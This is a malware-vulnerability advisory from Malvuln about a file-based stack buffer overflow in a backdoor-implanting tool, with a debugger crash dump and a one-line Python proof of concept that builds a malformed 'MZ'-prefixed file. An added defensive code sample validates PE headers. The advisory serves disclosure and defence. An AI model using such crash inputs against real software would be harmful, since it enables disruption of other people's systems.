Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Nucleroot.mf
Vulnerability: Stack Buffer Overflow
Description: MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The backdoor tool doesn't properly check the files it loads and falls victim to a file-based local buffer overflow.
Type: PE32
MD5: 8de56eef118187a89eeab972288ce94d
Vuln ID: MVID-2021-0420
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 12/11/2021

Memory Dump:

(1790.60): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003
eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400          ret     14h
0:000> .ecxr
eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8
eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
*** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
Backdoor_Win32_Nucleroot_mf+0x90e3:
004090e3 813850450000    cmp     dword ptr [eax],4550h ds:002b:454e4141=????????

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

FAULTING_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000    cmp     dword ptr [eax],4550h

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 454e4141
Attempt to read from address 454e4141

PROCESS_NAME:  Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  454e4141
READ_ADDRESS:  454e4141

FOLLOWUP_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000    cmp     dword ptr [eax],4550h

MOD_LIST:
NTGLOBALFLAG:  0
APPLICATION_VERIFIER_FLAGS:  0
FAULTING_THREAD:  00000060
BUGCHECK_STR:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER:  from 004049b2 to 004090e3

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3
0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2
0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24
0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690
0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01
0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d
0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe
0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607
0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0
0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664
0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615
0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659
0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982
0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b
0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655
0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f
0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf0 00420d33 00690053 0065007a 0066004f Backdoor_Win32_Nucleroot_mf+0x20d4d
0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053
0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a
0042fd00 006d0049 00670061 00000065 00610042 0x66004f
0042fd04 00670061 00000065 00610042 00650073 0x6d0049
0042fd08 00000000 00610042 00650073 0066004f 0x670061

STACK_COMMAND:  ~0s; .ecxr ; kb
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  Backdoor_Win32_Nucleroot_mf+90e3
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: Backdoor_Win32_Nucleroot_mf
IMAGE_NAME:  Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
DEBUG_FLR_IMAGE_TIMESTAMP:  4456df74
FAILURE_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown
BUCKET_ID:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3

Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > DOOM.exe

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
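The faulting instruction above (cmp dword ptr [eax],4550h) tests for the "PE\0\0" signature through a pointer derived from the loaded file's own header, which the PoC fills with 'A' bytes. As an added example, not code from the advisory or from MaskPE, the following shows the header validation a PE loader should perform before dereferencing e_lfanew; the two inputs are constructed here (the PoC's 'MZ' + 'A'*20000 shape and a minimal well-formed DOS stub plus NT signature).

```python
import struct
from typing import Tuple

# Constructed inputs (not the advisory's sample): the PoC file shape,
# and a minimal well-formed DOS header whose e_lfanew points at "PE\0\0".
MALFORMED = b"MZ" + b"A" * 20000


def _minimal_pe() -> bytes:
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew -> NT headers at 0x80
    buf = bytes(dos) + bytes(0x80 - 0x40)     # padding up to e_lfanew
    # IMAGE_FILE_HEADER: Machine=i386, NumberOfSections=0, timestamps/symbols 0,
    # SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE|32BIT_MACHINE
    buf += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x102)
    return buf


WELLFORMED = _minimal_pe()

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
E_LFANEW_OFFSET = 0x3C
DOS_HEADER_SIZE = 0x40
FILE_HEADER_SIZE = 20


def validate_pe_headers(data: bytes) -> Tuple[bool, str]:
    """Check the DOS header, e_lfanew bounds and NT signature before use."""
    if len(data) < DOS_HEADER_SIZE:
        return False, "file shorter than IMAGE_DOS_HEADER"
    if data[:2] != IMAGE_DOS_SIGNATURE:
        return False, "missing MZ signature"
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    # This is the check the crashing code lacks: e_lfanew is read straight
    # from the file, so an 'A'-filled header yields 0x41414141 and
    # base + e_lfanew points outside the mapped image.
    if e_lfanew < DOS_HEADER_SIZE or e_lfanew + 4 + FILE_HEADER_SIZE > len(data):
        return False, f"e_lfanew 0x{e_lfanew:x} outside file bounds"
    if data[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        return False, "NT signature is not PE\\0\\0"
    return True, "ok"
```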